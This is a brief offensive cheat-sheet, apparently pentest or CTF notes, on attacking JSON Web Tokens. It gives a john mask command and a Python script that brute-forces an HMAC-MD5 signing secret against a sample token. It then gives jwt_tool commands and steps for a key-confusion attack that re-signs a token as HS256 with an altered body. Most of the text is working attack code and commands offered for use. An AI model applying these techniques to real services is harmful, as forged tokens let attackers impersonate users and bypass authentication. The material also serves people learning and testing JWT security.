# JWT
## MD5\_HMAC
* Easy way
```
john --mask=fsrwjcfszeg?l?l?l?l?l --format=HMAC-MD5 jwt.txt
```
* Hard way
import base64
import hashlib
import hmac
import json
def remove_padding(encoded_string):
return encoded_string.rstrip("=")
def jwt_creator(secret_key):
encoded_header = 'eyJhbGciOiJNRDVfSE1BQyJ9'
encoded_payload = 'eyJ1c2VybmFtZSI6InMifQ'
encoded_token = encoded_header + "." + encoded_payload
signature = hmac.new(secret_key.encode("utf-8"), encoded_token.encode("utf-8"), hashlib.md5).digest()
encoded_signature = remove_padding(base64.urlsafe_b64encode(signature).decode("utf-8"))
jwt_token = encoded_token + "." + encoded_signature
return jwt_token
original_jwt = 'eyJhbGciOiJNRDVfSE1BQyJ9.eyJ1c2VybmFtZSI6InMifQ.49BQc1Pj96LW8tUhAHXzYA'
permutations_file = 'permutations.txt'
secret_found = None
### Code to generate the permutations ###
#import itertools
#characters = 'abcdefghijklmnopqrstuvwxyz'
#permutations = itertools.product(characters, 5)
#with open('permutations.txt', 'w') as file:
# for perm in permutations:
# line = 'fsrwjcfszeg' + ''.join(perm) + '\n'
# file.write(line)
##########################################
with open(permutations_file, 'r') as f:
for line in f:
secret_key = line.strip()
token = jwt_creator(secret_key)
print(token)
if token == original_jwt:
secret_found = secret_key
break
if secret_found:
print("Found secret: " + secret_found)
else:
print("No matching secret found.")
## Key Confusion attack
### [Jwt-tool.py](https://github.com/ticarpi/jwt_tool)
Generate a public key.
{% code overflow="wrap" %}
```
python3 jwt_tool.py JWT_TOKEN -X k -jw jwks.json -V
# OR
python3 jwt_tool.py JWT_TOKEN -X k -pk public.pem -V
```
{% endcode %}
Base64 encode the public key
```
cat kid_0_1694791448.pem | base64 -w 0 | c
```
Now generate a new symmetric key using burpsuite jwt editor
Now click on sign and select the new generated symmetric key
Finally change the algorithm in the alg header to `HS256` and change the body to your needs
### References:
*
*
